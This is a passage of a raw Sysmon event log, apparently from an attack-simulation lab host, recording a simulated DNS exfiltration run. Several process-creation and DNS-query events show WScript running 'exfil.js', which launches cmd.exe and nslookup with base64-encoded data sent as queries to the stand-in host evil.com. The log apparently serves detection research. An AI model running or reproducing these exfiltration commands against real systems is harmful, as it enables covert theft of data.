14:21:43.894{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213116Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.894{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213115Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.894{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18F7-629A-5745-000000005F02}5592C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000213114Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.894{2E1864BB-18F7-629A-5545-000000005F02}26202860C:\Windows\system32\cmd.exe{2E1864BB-18F7-629A-5745-000000005F02}5592C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000213113Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.897{2E1864BB-18F7-629A-5745-000000005F02}5592C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18F7-629A-5545-000000005F02}2620C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlewmc.tmp 2>&1 22542200x8000000000000000213112Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.796{00000000-0000-0000-0000-000000000000}2764evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000213111Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.723{00000000-0000-0000-0000-000000000000}3712evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000213110Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.650{00000000-0000-0000-0000-000000000000}6324evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000213109Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.569{00000000-0000-0000-0000-000000000000}5692evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000213108Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.508{00000000-0000-0000-0000-000000000000}3452evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000213107Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.432{00000000-0000-0000-0000-000000000000}300evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000213106Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.353{00000000-0000-0000-0000-000000000000}5000evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000213105Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.242{00000000-0000-0000-0000-000000000000}7368evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000213104Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.130{00000000-0000-0000-0000-000000000000}4552evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000213103Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.044{00000000-0000-0000-0000-000000000000}5124evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000213102Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.971{00000000-0000-0000-0000-000000000000}4040evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000213101Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.873{00000000-0000-0000-0000-000000000000}3868evil.com0::ffff:127.0.0.1;<unknown process> 10341000x8000000000000000213100Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.871{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-18F7-629A-5645-000000005F02}2900C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213099Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.871{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18F7-629A-5645-000000005F02}2900C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213098Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.858{2E1864BB-18F7-629A-5645-000000005F02}29005584C:\Windows\system32\conhost.exe{2E1864BB-18F7-629A-5545-000000005F02}2620C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213097Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.845{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18F7-629A-5645-000000005F02}2900C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000213096Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.845{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18F7-629A-5545-000000005F02}2620C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000213095Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.825{2E1864BB-18E0-629A-6742-000000005F02}39765040C:\Windows\System32\WScript.exe{2E1864BB-18F7-629A-5545-000000005F02}2620C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213094Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.825{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213093Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.825{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213092Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.825{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213091Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.825{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000213090Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.835{2E1864BB-18F7-629A-5545-000000005F02}2620C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlewmc.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000213089Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.825{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlodu.tmpMD5=08096E815298C9510FB964E33BF683ED,SHA256=94103DD12783300292E08E6F36A36F71864DF751648CBC0CFA38A7881E3764D7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000213088Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.793{2E1864BB-18F7-629A-5345-000000005F02}69327564C:\Windows\system32\conhost.exe{2E1864BB-18F7-629A-5445-000000005F02}5036C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213087Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.793{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213086Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.793{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213085Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.793{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213084Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.793{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213083Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.793{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18F7-629A-5445-000000005F02}5036C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000213082Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.793{2E1864BB-18F7-629A-5245-000000005F02}12762864C:\Windows\system32\cmd.exe{2E1864BB-18F7-629A-5445-000000005F02}5036C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000213081Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.798{2E1864BB-18F7-629A-5445-000000005F02}5036C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT KioqV2luMzJfU2hhcmUqKio= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18F7-629A-5245-000000005F02}1276C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT KioqV2luMzJfU2hhcmUqKio= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlodu.tmp 2>&1 10341000x8000000000000000213080Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.757{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-18F7-629A-5345-000000005F02}6932C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213079Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.757{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18F7-629A-5345-000000005F02}6932C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213078Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.741{2E1864BB-18F7-629A-5345-000000005F02}69327564C:\Windows\system32\conhost.exe{2E1864BB-18F7-629A-5245-000000005F02}1276C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213077Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.741{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18F7-629A-5345-000000005F02}6932C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000213076Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 